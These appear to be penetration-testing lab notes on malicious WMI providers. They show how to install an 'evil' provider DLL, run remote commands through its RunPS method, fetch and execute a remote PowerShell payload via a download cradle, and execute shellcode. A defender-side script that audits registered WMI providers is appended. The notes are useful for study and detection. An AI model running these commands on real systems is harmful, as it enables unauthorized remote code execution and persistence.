Win32 localadmins provider:
One of the earlier PoC evil WMI providers:
https://github.com/rzander/localadmins
Evil Network connection WMI Provider:
https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider
Open the command prompt with admin rights in this path (C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug):
C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug>InstallUtil.exe EvilNetConnectionWMIProvider.dll


In another PowerShell session:
Here we can see win32_netconnection in the output.
PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_net* -list

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -class win32_netconnection -name RunPS -ArgumentList "Get-Host"

We can now also try this from a non-admin PowerShell session to get the info:
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList "whoami"

PS C:\Users\victim6> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList "hostname"

PS C:\Users\victim6> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList "ipconfig"

To execute a PowerShell script:
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList "iex (New-Object Net.WebClient).DownloadString('http://192.168.222.131/payload.ps1')"
Malicious WMI providers: Evil WMI provider.
https://github.com/subtee/EvilWMIProvider
Execute shellcode:
PS C:\Users\victim6\Downloads> invoke-wmimethod -class win32_evil -name execshellcode -ArgumentList @(0x90,0x90,0x90),$null
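
A defender-side check for the provider registrations shown above, as an added example that is not from the original page or the linked projects: it lists every __Win32Provider instance in a namespace, resolves the backing binary through the CLSID's InprocServer32 key, and marks binaries outside %SystemRoot% or without a valid Authenticode signature for review. The function name Get-WmiProviderAudit and the registry layout it reads (including a CodeBase value for .NET assemblies) are assumptions.

```powershell
# Added example: audit the WMI providers registered in a namespace.
# Assumption: each provider's CLSID resolves under HKLM:\SOFTWARE\Classes\CLSID.
function Get-WmiProviderAudit {
    param([string]$Namespace = 'root\cimv2')

    Get-CimInstance -Namespace $Namespace -ClassName __Win32Provider | ForEach-Object {
        $provider = $_
        $key = "HKLM:\SOFTWARE\Classes\CLSID\$($provider.CLSID)\InprocServer32"
        $reg = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue

        # Native provider: the default value is the DLL path.
        # .NET provider (assumed layout): default value is mscoree.dll, CodeBase names the assembly.
        $path = $null
        if ($reg -and $reg.CodeBase) {
            $path = ([uri]$reg.CodeBase).LocalPath
        } elseif ($reg -and $reg.'(default)') {
            $path = [Environment]::ExpandEnvironmentVariables($reg.'(default)').Trim('"')
        }

        # Only check the signature when the resolved path is an existing file.
        $signature = 'NotChecked'
        if ($path -and (Test-Path -LiteralPath $path -PathType Leaf)) {
            $signature = (Get-AuthenticodeSignature -FilePath $path).Status.ToString()
        }

        # A provider binary in a user-writable location such as Downloads lands here.
        $outsideWindows = [bool]$path -and
            -not $path.StartsWith($env:SystemRoot, [StringComparison]::OrdinalIgnoreCase)

        [pscustomobject]@{
            Provider       = $provider.Name
            HostingModel   = $provider.HostingModel
            Binary         = $path
            Signature      = $signature
            OutsideWindows = $outsideWindows
            Review         = $outsideWindows -or ($signature -notin 'Valid', 'NotChecked')
        }
    }
}

# Run elevated; providers flagged for review are listed first.
Get-WmiProviderAudit | Sort-Object Review -Descending | Format-Table -AutoSize
```

Providers whose CLSID has no InprocServer32 key show an empty Binary column and need a manual look rather than counting as clean.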
@Saksham Dixit
